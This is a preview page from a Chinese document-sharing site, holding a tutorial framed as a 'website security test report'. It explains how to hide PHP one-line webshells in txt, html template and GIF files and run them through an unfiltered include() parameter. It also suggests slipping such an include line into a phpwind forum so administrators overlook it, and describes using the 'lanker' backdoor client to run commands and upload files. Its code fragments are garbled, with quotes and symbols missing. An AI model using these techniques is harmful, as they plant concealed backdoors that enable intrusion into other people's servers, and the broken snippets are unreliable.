网站安全测试报告_测试报告.doc_第1页
全文预览已结束

下载本文档

版权说明:本文档由用户提供并上传,收益归属内容提供方,若内容存在侵权,请进行举报或认领

文档简介

网站安全测试报告_测试报告 最近很多朋友都在问我是否能把我那一句话木马隐藏到html或图片里,其实把一句话木马插入到php文件中就已经很隐蔽了,如果说硬是要放到html文件或图片里,就接着往下看这篇的篇测试报告吧。要知道如果光把php语句放到图片里是无论如何也不能执行的,因为php只解析扩展名为php的文件。所以说要能使隐藏在图片里的php语句执行。我们就的借助php中的调用函数 :include 、require 等。我们还记得前些日子把木马隐藏到图片的文章吧。也就是在php文件里用include(“x.gif”)这样的语句来调用隐藏在图片的木马语句。asp中语句也类似。看似非常隐蔽但直接调用图片对稍微懂点php的人就不难发现可疑之处。由于url 里用get方式很难传递参数,这就使得插入木马的性能得不到发挥。include 函数在php中使用的比较频繁,所以引起的安全问题也实在太多,例如phpwind1.36的漏洞就是因为include后面的变量没做过滤引起的。由此我们就可以构造类似的语句来插入到php文件中。然后把木马隐藏到图片或html文件里,可以说隐蔽性就更高了。如在phpwind论坛里插入下面的语句:?include includ/.$phpwind_root;? 一般管理员是无法看出来的。有了include 函数来辅助帮忙我们就可以把php木马隐藏到 诸如 txt、html和图片文件等很多类型的文件里来了。因为txt、html和图片文件这三种类型的文件最无论在论坛还是文章系统里是最为常见的了,下面我们就依次来做测试。首先建立一php文件test.php 文件内容为:$test=$_gettest;include test/.$test;?txt文件一般都是说明文件,所以我们把一句话木马放到目录的说明文件里就ok了。随便建立一个txt文件t.txt。我们把一句话木马粘贴到t.txt文件里。然后访问 http:/localhost/test/test.php?test=./t.txt 如果你看到t.txt的内容就证明ok了, 然后把在lanker微型php后门客户端 木马地址添入 http:/localhost/test/test.php?test=./t.txt 密码里添入cmd就可以了,执行返回的结果都可以看到。对于html的文件,一般都为模版文件。为了使插入到html的文件的木马能被调用执行而且不被显示出来,我们可以在html里加入一个隐藏属性的文本框 ,如: 然后使用方法同上。执行的返回结果一般都可以查看源文件看到。 如使用查看本程序目录功能。查看源文件内容为 我可以得到目录为 c:uniserver2_7swwwtest。下面我们说说图片文件,要说最为毒的一招莫过于把木马隐藏到图片里。我们可以直接对一个图片进行编辑,把插入到图片末尾经测试一般都不会对图片造成影响。然后同样方法客户端木马地址添入我们查看php环境变量 返回的是结果是原图片。这里可能要和我们想象的结果有些差距了,其实命令已经运行了,只是返回的结果看不到而已,因为这是真正的gif文件,所以是不会显示返回结果的,为了证明是否真的执12下一页 行了命令我们 执行上传文件命令。果不出所料,文件已经成功上传到服务器上。这样伪造的优点是隐蔽性好。缺点也自然不用说了是没回显。如果你想看到返回的结果,那就拿出记事本伪造一个假的图片文件吧。到这里就基本测试完了,怎

温馨提示

  • 1. 本站所有资源如无特殊说明,都需要本地电脑安装OFFICE2007和PDF阅读器。图纸软件为CAD,CAXA,PROE,UG,SolidWorks等.压缩文件请下载最新的WinRAR软件解压。
  • 2. 本站的文档不包含任何第三方提供的附件图纸等,如果需要附件,请联系上传者。文件的所有权益归上传用户所有。
  • 3. 本站RAR压缩包中若带图纸,网页内容里面会有图纸预览,若没有图纸预览就没有图纸。
  • 4. 未经权益所有人同意不得将文件中的内容挪作商业或盈利用途。
  • 5. 人人文库网仅提供信息存储空间,仅对用户上传内容的表现方式做保护处理,对用户上传分享的文档内容本身不做任何修改或编辑,并不能对任何下载内容负责。
  • 6. 下载文件中如有侵权或不适当内容,请与我们联系,我们立即纠正。
  • 7. 本站不保证下载资源的准确性、安全性和完整性, 同时也不承担用户因使用这些下载资源对自己和他人造成任何形式的伤害或损失。

评论

0/150

提交评论